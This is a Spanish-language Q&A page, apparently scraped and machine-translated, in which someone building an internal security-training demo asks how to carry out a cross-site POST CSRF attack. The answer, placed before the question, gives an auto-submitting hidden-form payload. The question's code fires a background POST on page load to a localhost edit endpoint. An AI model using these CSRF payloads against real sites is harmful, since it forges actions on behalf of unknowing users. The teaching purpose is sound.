xsrf que kali ejemplo detected cookie certificado security web-applications csrf

security - kali - Cómo demostrar un ataque CSRF



que es csrf detected (2)

En el "otro host" (el atacante ), simplemente crea un FORM con el método POST cuya action (es decir, donde se envía el formulario) es su aplicación vulnerable. Luego lo envía con javascript en esa página.

Me gusta esto:

<html><body> <form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST"> <input type="hidden" name="csrf_param" value="POST_ATTACK"> </form> <script type="text/javascript">document.csrf_form.submit();</script> </body></html>

Esto enviará un POST a su aplicación vulnerable desde el host del atacante, cuando abra esa página.

Estoy haciendo una introducción a la seguridad web a otras personas en nuestra empresa, y quiero mostrar un ejemplo para tener más impacto.

Para esto he creado un sitio web pequeño que es vulnerable a este ataque, este sitio web solo será accesible en nuestra red.

Ahora estoy tratando de explotar este ataque, pero tengo una pregunta:

¿Cómo hacer esto con un formulario POST?

No tengo problemas para hacer esto con una consulta GET, pero con un POST, intento hacer esto con javascript, no hay problema si alojo mi código en el mismo host, pero si deseo alojar mi código en otro host para ser más realista, me bloquean porque es una solicitud entre dominios.

Entonces, ¿cómo debería enviar estos POST vars?

¡Gracias!

Aquí está mi código actual:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>CSRF attack demo</title> <script type="text/javascript"> function getHTTPObject() { var http = false; //Use IE''s ActiveX items to load the file. if(typeof ActiveXObject != ''undefined'') { try {http = new ActiveXObject("Msxml2.XMLHTTP");} catch (e) { try {http = new ActiveXObject("Microsoft.XMLHTTP");} catch (E) {http = false;} } //If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document. } else if (window.XMLHttpRequest) { try {http = new XMLHttpRequest();} catch (e) {http = false;} } return http; } function post_to_url(path, params, method) { method = method || "post"; // Set method to post by default, if not specified. // The rest of this code assumes you are not using a library. // It can be made less wordy if you use one. var form = document.createElement("form"); form.setAttribute("method", method); form.setAttribute("action", path); for(var key in params) { var hiddenField = document.createElement("input"); hiddenField.setAttribute("type", "hidden"); hiddenField.setAttribute("name", key); hiddenField.setAttribute("value", params[key]); form.appendChild(hiddenField); } document.body.appendChild(form); form.submit(); } function postToUrlBackground(path, params){ var http = getHTTPObject(); http.open("POST", path, true); //Send the proper header information along with the request http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.setRequestHeader("Content-length", params.length); http.setRequestHeader("Connection", "close"); http.onreadystatechange = function() {//Call a function when the state changes. if(http.readyState == 4 && http.status == 200) { //alert("Response received"); } } http.send(params); } function TryAttack(){ //alert("Sending"); postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE"); //postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE" ); //alert("sent"); } </script> </head> <body onload="TryAttack()"> <img src=image.png /> </body> </html>